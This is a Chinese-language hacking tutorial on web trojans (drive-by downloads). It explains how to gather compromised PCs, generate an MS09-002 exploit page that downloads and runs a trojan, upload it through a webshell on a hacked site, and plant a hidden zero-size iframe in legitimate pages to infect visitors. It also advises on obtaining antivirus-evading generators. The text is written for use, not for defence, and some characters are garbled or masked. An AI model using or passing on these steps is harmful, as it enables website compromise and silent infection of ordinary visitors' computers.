网马技术揭秘
首先说什么是网马,网马有什么用呢?例如,你们想玩鸽子,想找肉鸡。想找不少不少的肉鸡。固然方法不少,例如135抓鸡什么的。可是我想你们都遇到一个问题,看人家教程上,抓鸡一会儿就来了一串一串的。我本身操做为啥老半天就扫不到呢?由于这漏洞出来好久了,再者,每天有人扫肉鸡。固然肉鸡就少了,也很难找到。还有,你们扫描肉鸡的方法可能也有点不对。综合起来,利用这些漏洞找肉鸡的效率很低下。那么用网马呢,网马就是挂马。你想下。要是一个网站,一天有1万我的访问,一万我的中哪怕概率下降到%1的中马率。一天也有100我的中马成为你的肉鸡啊。并且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。因此网马很爽,因此也比本身拿个软件扫描漏洞来劲。
上面说了网马的做用。综合叙述下,就是快捷,方便。更快,更高,更强的达到散播***的途径。而后,你们应该明什么是网马了吧?对的,网马简单的说下,就是网页***。当别人访问一个网页就可能从这个网页自动下载***,而且在你后台悄悄运行。这就是网马。简单的这么理解,固然咱们学***知识的确定对这些东西不能简单理解了事了。可是,咱们只是入门的小菜鸟,因此再深刻了解一点点就好了。
深刻说下。什么是网马?网马就是利用网页代码操做win的漏洞。首先,咱们得明白什么是网页。为何咱们打开一个网站,这个网站会显示出这些图片。就如你如今看的这篇帖子,为何背景是这个颜色,为何字体有大有小,为何网页各处的颜色不一样。而后构成了这样一个网页。怎么构成的?难道就是简简单单的几张图片就构成了咱们如今看到的这个网页页面?错了。是图片+文字+代码。这是一个网页构成的基本元素。可是,代码是必需要的。这里提到了代码。例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。这些设计,规划,就是代码来操做的。当设计者把网页代码编写好了。而后放在服务器上(通常来讲是IIS服务器.IIS简单的说下,就是网页服务器.)进行服务器的解析。而后当你访问这个网站。那么就获得了你如今所看到的网页了。这里提到了代码。是的。不光服务器要分析代码。你的电脑也要解析分析代码。你的电脑分析了代码才能显示出这样的页面。因此你们能够在网页空白处,右键单击 查看源文件 就会看到代码了。固然,这个只是你单方面的代码,核心代码仍是在服务器上。你这样看到的只是显示的页面解析的静态的页面代码。也就是说是HTM的代码。因此,你在浏览器上点,文件---另存为 保存网页的时候都是HTM格式!
上面说到了代码。下面说下漏洞。WIN这个操做系统有不少漏洞。我相信你们都知道,清楚。例如:MS06-04O这样的ms开头的漏洞名字。这些漏洞是怎么造成的呢。就是代码操做造成的。有些朋友就问了,代码怎么会出现漏洞呢。一时半会讲不清楚。举例吧,简单通俗的例子。例如x=取文本 y=取X前三个数字 这么一段代码。若是实际操做的时候,这个文本若是取出来时1234567 那么X就等于1234567 那么Y取的是X文本前三个数字那么Y就等于123.这么一段代码看是没问题。可是若是取不到文本呢.或者取到的文本数字就1个呢?好比X=1 就一个数字。那么Y怎么取出前三个数字呢?遇到特殊状况,那么就有可能形成代码出错。固然,我这里是举例,为了你们简单,就用最最最通俗的例子给你们举例。具体代码不可能这么乱七八糟的。若是咱们这段代码加个判断。若是X取到的数字小于3.那么Y就不取前三个数字,或者Y就等于0。那么是否是什么事情都没了呢?可是,程序员一不当心,没注意,或者没看到这个代码的弊端。那么就有可能形成代码出错。形成了漏洞。以小画大,那么WIN的操做漏洞大多数也是相似的。因为程序代码的问题。被***发现了。那么就利用这段代码的漏洞,构形成别有用心的代码形成对电脑的破坏。固然,不局限于WIN系统。也能够是例如迅雷,暴风影音照样的第三方软件!
口水不少。也不知道你们听懂了没有。咱们来结合下。上面说到了访问网页其实就是根据网页,而后本地执行代码。而后显示在咱们的电脑网页上面。WIN的漏洞就是代码漏洞。***编造一段利用这个代码的漏洞能够进行***。聪明的朋友应该想到了。访问网页要执行一些代码,win的漏洞要被利用须要执行一些特殊代码!因此。网马就是构造一段特殊的代码,当你电脑访问了执行了这段代码,正好你的电脑上有被这段代码利用的漏洞。那么!恭喜你,你就中网马了。
网马就是这样造成的。因此,有些***很牛B的说。我就算是把个人管理员帐号密码告诉你。你也***不了个人电脑。就如,你把你的网马发给我。我访问了。我照样没事。为啥,我电脑没漏洞,你怎么利用!呵呵,我想你们能理解了吧。
固然,咱们小菜鸟深刻到这步了解就差很少了。如何找漏洞。如何找到漏洞构造此漏洞的代码编写。这就是***们的事情了。咱们还没这个能力。下面说下网马制做。上文提到了,网马就是一段网页代码。固然,咱们不懂这些代码如何编写。咱们仍是用别人的工具吧。网上也有不少网马生成工具。我随便找了一款。你们也能够自行去网上搜索寻找。
首先,咱们打开软件,咱们能够看到。上面有不少ms这样开头选项。这就是WIN的系统漏洞利用。固然咱们看到了有暴风,联众,等这样的。这就是第三方软件漏洞的利用了。这里,注意上面有个下载地址。什么是下载地址呢。就是咱们***的下载地址。咱们把***上传到网站上。而后获取到***的下载地址。固然了。别人直接访问你的这个下载地址。系统会提示你是否下载的提示不说,别人不运行。***就运行不了。因此这里要结合上网页代码。构形成一个网马。我本地作实验。就不上传***了。假如,它上面填写的就是个人***下载地址吧。我点ms9002。看到了吗?都是代码。网页代码!092.htm的代码意思是运行同目录下的ms09002.js。ms09002.js的大概意思是。利用ms09002的漏洞,自动下载咱们上面指定的那个网址的***后,自动运行。固然ms09002的代码是加密了的。咱们也看不大实在!
那么这两个文件就是咱们的网马文件了。咱们只须要把这两个文件上传到咱们网站上。别人访问了这个网页,若是有ms09002这个漏洞,就可能中马!咱们来上传吧。我用个人一个webshell给你们演示下吧。网马我就上传到个人webshell目录下!网马生成器,生成了两个文件,就上传两个。生成了一个,就上传一个。
那么咱们的网马地址在哪儿呢?咱们的上传地址是:C:\inetpub\wwwroot\EasySite\Portals\95\cpzs\ 这个目录下。那么咱们要访问的目录地址就是EasySite\Portals\95\cpzs\ +网马名字 咱们网马是由092.htm调用运行同目录下的ms09002.js那么网马名字就是092.htm。那么访问地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm到此。咱们的网马就作好了。咱们的ms09002漏洞网马地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm 发给有此漏洞的朋友。若是他们电脑没网马拦截软件,或者没其余防护手段。那么极有可能中马!
这里又说下。构成网马的代码不少种。固然,网上免费的,分两种。一种是***炫耀技术,故意放出来的。第二种,商业***,写的免费的给你们试用。对于这样公布了的网马生成器。有几个坏处。第一,中马效率低下。意思是说,有可能别人访问了你的网站根本不会中马。第二,容易被杀毒软件拦截。这个你们都清楚吧!第三,容易当别人的工具。可能免费的。里面的代码加入了工具制做者的网马。你挂上了网马,别人种了你的网马,也可能中了此工具制做者的网马!这就是致使不少朋友作的网马失效的缘由!因此,对于网马生成器。你们能够耐心的去网上找找。确定会找到一个中马率高,免杀的免费的。只不过须要花费大量的时间和精力去搜索而后测试。固然,有经济的朋友能够购买商业***的网马生成器。通常来讲很不错的。若是购买请注意网络骗子!
上面几大段谈了什么是网马用途,什么是网马,如何制做网马。下面我说说怎么挂马吧!
挂马什么意思?出现这个概念的时候是基于网马之上的。我网马作出来了。不可能每一个群,每一个人去宣传个人网马地址吧。如今的人也聪明。通常的网址不点的。因此这里要用到挂马了。把这个网址附加到正常的网页上。当网友访问了正常的网页,也就不知不觉的中了你的网马了。
用到的代码:<iframe src="你的网马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>这句代码通常加在网页的末尾。例如我***了一个网站。我要在他的网站上挂马。例如在http://****/EasySite/Portals/95/cpzs/p_w_picpath.asp这个页面上挂马。那么,咱们进入webshell找到p_w_picpath.asp这个页面。把:<iframe src="你的网马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>这代码加入进去。上面网马作好了。那么就加入:<iframe src="http://www.******.com/EasySite/Portals/95/cpzs/092.htm" name="lcx" width="0" height="0" frameborder="0"></iframe>保存后。那么咱们挂马就成功了。那么别人一访问http://****/EasySite/Portals/95/cpzs/p_w_picpath.asp这个正常页面。那么就会不知不觉也访问了你的网马网页,就会中了你的网马了。
固然,若是你要挂在首页就在首页的文件里面加入代码。你若是要在整个网站的每一个页面都挂马。那么每一个页面均可以加入此代码。这就是挂马。
中安致远 IT教育培训机构 www.sans.org.cn